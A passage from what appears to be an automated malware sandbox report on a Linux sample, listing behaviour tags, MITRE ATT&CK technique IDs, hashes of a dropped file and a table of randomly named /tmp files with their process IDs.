  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:959

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/rDsVFoROZ8zULsq0ECwC9PnFG07Hoftyha

Filesize
153B

MD5
998368d7c95ea4293237f2320546e440

SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4

SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736

SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Download Submit

ioc	pid	Process
/tmp/rDsVFoROZ8zULsq0ECwC9PnFG07Hoftyha	730	rDsVFoROZ8zULsq0ECwC9PnFG07Hoftyha
/tmp/SlDj5TSJR6RylxfZ33QxzEv4UzoVlp55hq	738	SlDj5TSJR6RylxfZ33QxzEv4UzoVlp55hq
/tmp/XJIMlQ5yTC5UhM0563PzW7iOEkheGbOywX	751	XJIMlQ5yTC5UhM0563PzW7iOEkheGbOywX
/tmp/u8uTNxB3q6hm8F3HdfRK2rUd2oyhZjIsZR	777	u8uTNxB3q6hm8F3HdfRK2rUd2oyhZjIsZR
/tmp/AtEVFz9qaEzuFEg8slphkHEmLHWAeeo5o9	802	AtEVFz9qaEzuFEg8slphkHEmLHWAeeo5o9
/tmp/jl9G16g8UHzTTVgunll69zrWyh5XXTEArr	814	jl9G16g8UHzTTVgunll69zrWyh5XXTEArr
/tmp/vkjJMXgIk1bFBRbuWfsv4LdnjpjOqxHeTV	821	vkjJMXgIk1bFBRbuWfsv4LdnjpjOqxHeTV
/tmp/paZXKvInltPZZlgav8uxLyPSyDDbI3OtMd	840	paZXKvInltPZZlgav8uxLyPSyDDbI3OtMd
/tmp/MAbJpgeNRjeRlcWuLOrN5z56NYg80HfkB8	865	MAbJpgeNRjeRlcWuLOrN5z56NYg80HfkB8
/tmp/KD0UydW3nLYgTBdKMwh0v3TA9MepHRHMOW	872	KD0UydW3nLYgTBdKMwh0v3TA9MepHRHMOW
/tmp/gSQeicNTZ5M2tjVGqMLdQ4tM8A2mUBTVpf	879	gSQeicNTZ5M2tjVGqMLdQ4tM8A2mUBTVpf
/tmp/0sQwmn5EIp9dtUVeOBfB1sl11e7MG6ejMs	886	0sQwmn5EIp9dtUVeOBfB1sl11e7MG6ejMs
/tmp/axpDb75vO6RiaxFMfEco1fEwhJOAkt6xp0	893	axpDb75vO6RiaxFMfEco1fEwhJOAkt6xp0
/tmp/8MBDKLm0FP3DGmWa8dnIdSipQneweLhbFt	900	8MBDKLm0FP3DGmWa8dnIdSipQneweLhbFt
/tmp/XJIMlQ5yTC5UhM0563PzW7iOEkheGbOywX	907	XJIMlQ5yTC5UhM0563PzW7iOEkheGbOywX
/tmp/u8uTNxB3q6hm8F3HdfRK2rUd2oyhZjIsZR	914	u8uTNxB3q6hm8F3HdfRK2rUd2oyhZjIsZR
/tmp/AtEVFz9qaEzuFEg8slphkHEmLHWAeeo5o9	921	AtEVFz9qaEzuFEg8slphkHEmLHWAeeo5o9
/tmp/jl9G16g8UHzTTVgunll69zrWyh5XXTEArr	928	jl9G16g8UHzTTVgunll69zrWyh5XXTEArr
/tmp/vkjJMXgIk1bFBRbuWfsv4LdnjpjOqxHeTV	935	vkjJMXgIk1bFBRbuWfsv4LdnjpjOqxHeTV
/tmp/paZXKvInltPZZlgav8uxLyPSyDDbI3OtMd	942	paZXKvInltPZZlgav8uxLyPSyDDbI3OtMd
/tmp/MAbJpgeNRjeRlcWuLOrN5z56NYg80HfkB8	949	MAbJpgeNRjeRlcWuLOrN5z56NYg80HfkB8
/tmp/KD0UydW3nLYgTBdKMwh0v3TA9MepHRHMOW	956	KD0UydW3nLYgTBdKMwh0v3TA9MepHRHMOW